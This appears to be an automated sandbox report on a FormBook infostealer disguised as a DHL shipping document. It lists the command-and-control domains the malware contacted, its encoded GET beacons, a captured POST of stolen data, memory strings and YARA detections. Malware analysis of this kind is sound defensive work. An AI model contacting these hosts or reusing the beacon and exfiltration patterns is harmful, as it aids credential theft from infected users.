          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:28:34 GMTContent-Type: application/x-www-form-urlencodedContent-Length: 498Connection: closeLast-Modified: Mon, 01 Dec 2014 15:11:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 3c 70 3e 53 6f 72 72 79 2c 20 74 68 69 73 20 69 73 20 74 68 65 20 76 6f 69 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 50 6f 77 65 72 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 65 72 6c 64 61 6e 63 65 72 2e 6f 72 67 2f 22 3e 44 61 6e 63 65 72 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Error 404</title><link rel="stylesheet" href="/css/error.css" /><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /></head><body><h1>Error 404</h1><div id="content"><h2>Page Not Found</h2><p>Sorry, this is the void.</p></div><div id="footer">Powered by <a href="http://perldancer.org/">Dancer</a></div></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:28:37 GMTContent-Type: text/htmlContent-Length: 498Connection: closeLast-Modified: Mon, 01 Dec 2014 15:11:20 GMTChimera-API-Server: api3.uk.chimera.uk2group.comX-Powered-By: Perl Dancer 1.3513Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 3c 70 3e 53 6f 72 72 79 2c 20 74 68 69 73 20 69 73 20 74 68 65 20 76 6f 69 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 50 6f 77 65 72 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 65 72 6c 64 61 6e 63 65 72 2e 6f 72 67 2f 22 3e 44 61 6e 63 65 72 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Error 404</title><link rel="stylesheet" href="/css/error.css" /><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /></head><body><h1>Error 404</h1><div id="content"><h2>Page Not Found</h2><p>Sorry, this is the void.</p></div><div id="footer">Powered by <a href="http://perldancer.org/">Dancer</a></div></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Mon, 20 Mar 2023 10:28:40 GMTConnection: closeContent-Length: 1826Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e6 97 a0 e6 b3 95 e6 89 be e5 88 b0 e8 b5 84 e6 ba 90 e3 80 82 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <title></title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Mon, 20 Mar 2023 10:28:43 GMTConnection: closeContent-Length: 1826Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e6 97 a0 e6 b3 95 e6 89 be e5 88 b0 e8 b5 84 e6 ba 90 e3 80 82 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <title></title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font
          Source: help.exe, 00000005.00000002.582591092.00000000036E8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://motherhoodinthegarden.com/d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v
          Source: DHL_SHIPPING_DOCUMENT.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: help.exe, 00000005.00000002.582591092.0000000003D30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://perldancer.org/
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.363ww.top
          Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.363ww.top/d2a3/
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.363ww.topwww.rw-bau.comF7L99l=8qpwJ
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.afzalhossainantor.com
          Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.afzalhossainantor.com/d2a3/
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.afzalhossainantor.comwww.staatslieden.bizF7L99l=8qpwJ
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.espisys-technology.com
          Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.espisys-technology.com/d2a3/
          Source: explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.espisys-technology.comwww.on-smooth.comF7L99l=8qpwJ)
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fresnocap.com
          Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fresnocap.com/d2a3/
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fresnocap.comwww.vanguardfsm.comF7L99l=8qpwJ
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.getpay.life
          Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.getpay.life/d2a3/
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.luxgudonu.store
          Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.luxgudonu.store/d2a3/
          Source: explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.luxgudonu.storewww.sowmedia.siteF7L99l=8qpwJ
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motherhoodinthegarden.com
          Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.motherhoodinthegarden.com/d2a3/
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.on-smooth.com
          Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.on-smooth.com/d2a3/
          Source: explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.on-smooth.comwww.luxgudonu.storeF7L99l=8qpwJ
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rw-bau.com
          Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rw-bau.com/d2a3/
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rw-bau.comwww.worldhortihealth.comF7L99l=8qpwJ
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sowmedia.site
          Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sowmedia.site/d2a3/
          Source: explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sowmedia.sitewww.yh78898.comF7L99l=8qpwJ
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.staatslieden.biz
          Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.staatslieden.biz/d2a3/
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.staatslieden.bizwww.fresnocap.comF7L99l=8qpwJ
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vanguardfsm.com
          Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vanguardfsm.com/d2a3/
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vanguardfsm.comwww.xefordbienhoa.comF7L99l=8qpwJr
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.versicherungsgott.com
          Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.versicherungsgott.com/d2a3/
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.worldhortihealth.com
          Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.worldhortihealth.com/d2a3/
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.worldhortihealth.comwww.afzalhossainantor.comF7L99l=8qpwJ
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xefordbienhoa.com
          Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xefordbienhoa.com/d2a3/
          Source: explorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yh78898.com
          Source: explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yh78898.com/d2a3/
          Source: explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yh78898.comwww.363ww.topF7L99l=8qpwJ
          Source: 35-7052c.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 35-7052c.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 35-7052c.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 35-7052c.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownHTTP traffic detected: POST /d2a3/ HTTP/1.1Host: www.motherhoodinthegarden.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.motherhoodinthegarden.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.motherhoodinthegarden.com/d2a3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 77 3d 52 50 52 67 48 34 38 6e 43 63 44 72 51 57 37 78 32 56 34 7a 42 72 67 44 64 38 49 50 6e 38 76 6f 64 73 6f 58 51 78 4b 31 59 4b 66 4d 35 7a 6e 72 59 4d 78 73 76 48 33 4d 57 79 7a 71 4f 73 38 68 53 6c 50 6b 43 37 73 48 61 6c 33 64 52 4a 61 49 55 74 48 45 77 42 30 64 45 57 55 47 65 6f 4a 4e 45 31 6e 4e 54 76 37 4c 76 51 4d 56 4e 5f 61 4c 49 47 62 36 39 54 61 42 67 30 39 53 57 70 77 6a 63 39 73 53 78 69 4e 63 75 5a 67 70 66 58 6f 4e 74 75 34 38 6b 37 52 6f 46 4b 7a 32 6d 63 36 72 59 4f 68 6c 31 76 75 6c 69 48 75 4b 41 73 35 69 34 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mw=RPRgH48nCcDrQW7x2V4zBrgDd8IPn8vodsoXQxK1YKfM5znrYMxsvH3MWyzqOs8hSlPkC7sHal3dRJaIUtHEwB0dEWUGeoJNE1nNTv7LvQMVN_aLIGb69TaBg09SWpwjc9sSxiNcuZgpfXoNtu48k7RoFKz2mc6rYOhl1vuliHuKAs5i4g).
          Source: unknownDNS traffic detected: queries for: www.versicherungsgott.com
          Source: global trafficHTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=3fW4twhu5IX2LSkBcFVlWjxiVco4zHJfqjvATlwHU7q8puaymE5DWsW8adrpP96Z6UNtMOOwQnTRLGoNrAuApIzT11t8CH71vQ== HTTP/1.1Host: www.versicherungsgott.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8qmjHtlEGMmc9VxCg==&F7L99l=8qpwJ HTTP/1.1Host: www.motherhoodinthegarden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=VQWJd0zbMmoZh8qz35kMD56sFoyc6gTYso/MZ3BJ/Q0NuTQy4/HeuFqYJgzXZamkeMaLAEsOyVyJpFsiRVW3jp2QSfHijAqmyw== HTTP/1.1Host: www.getpay.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d2a3/?Mw=HRt8t1hC6ylxzqu69JiO+2+wCg/IpDjUJ4ODvXLX3JGoHCx8OnZPShMSZXcaT/6Kc192JGOxG+z3HQLrZrJeLIMi1PhqwEBrHA==&F7L99l=8qpwJ HTTP/1.1Host: www.espisys-technology.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=LnB6L7dnOzftoEr5UpUEPAqnd7gAmYo0E1h8Hr8XDrTV/RCVTRWGXzxgMAjKYD2ZiMi0DXBclY2V/N6w7Ub5K9/YRO3kcEW/Xg== HTTP/1.1Host: www.on-smooth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d2a3/?Mw=OjO/noXVMTk40sLqqWNUhETz5fwNQfL3iZv4zuTHX4FsBRg0F7vbWW3nqcxNlOGl4ZCA660VFsqTMG20zBTe2NhxC9mrQabZ6Q==&F7L99l=8qpwJ HTTP/1.1Host: www.luxgudonu.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=lIoejRloD0NPrvtjG56SffHGubt9bC7l7VozaPHGZoJbvkCik3wIcy97/aKLKqf+leC/SNQQ4bUyJkgTGWAXDnv4xxMA9hLjSw== HTTP/1.1Host: www.sowmedia.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d2a3/?Mw=/rn7tSorYChcOKKpyJYvjsebDE1EetOtUlfXV6ATVt8jMTNnk8PtnAR6Iam3VdBxJXQPah1uBiYgzGnhkXQp6MgBOVaGh7iMCA==&F7L99l=8qpwJ HTTP/1.1Host: www.yh78898.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
